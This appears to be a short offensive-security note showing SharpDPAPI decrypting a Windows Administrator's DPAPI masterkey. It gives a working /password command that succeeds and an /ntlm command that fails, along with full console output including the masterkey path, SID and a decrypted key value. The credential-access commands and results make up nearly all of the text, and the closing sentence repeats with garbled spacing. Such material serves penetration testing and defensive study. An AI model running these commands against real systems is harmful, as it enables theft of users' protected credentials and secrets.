Using the /ntlm switch, it is not possible to decrypt the user's masterkey. While on the same system, same user, same credentials it is possible with the cleartex password using the /password switch.
SharpDPAPI.exe masterkeys /password:ActivatorVisel
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.12.0
[*] Action: User DPAPI Masterkey File Triage
[*] Found MasterKey : C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-34994094-1847292267-723168731-500\d8377558-8284-494f-a0aa-4b62e8f072b7
[*] Preferred master keys:
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-34994094-1847292267-723168731-500:d8377558-8284-494f-a0aa-4b62e8f072b7
[*] User master key cache:
{d8377558-8284-494f-a0aa-4b62e8f072b7}:06D3269D3E6FA6D90291C8772B548D46A7CBCCE0
SharpDPAPI completed in 00:00:00.2418325
SharpDPAPI.exe masterkeys /ntlm:9CDD174A8CCF28AD8DE61701C58AE077
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.12.0
[*] Action: User DPAPI Masterkey File Triage
[*] Found MasterKey : C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-34994094-1847292267-723168731-500\d8377558-8284-494f-a0aa-4b62e8f072b7
[*] Preferred master keys:
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-34994094-1847292267-723168731-500:d8377558-8284-494f-a0aa-4b62e8f072b7
[!] No master keys decrypted!
SharpDPAPI completed in 00:00:00.2446776
Using the
/ntlmswitch, it is not possible to decrypt the user's masterkey. While on the same system, same user, same credentials it is possible with the cleartex password using the/passwordswitch.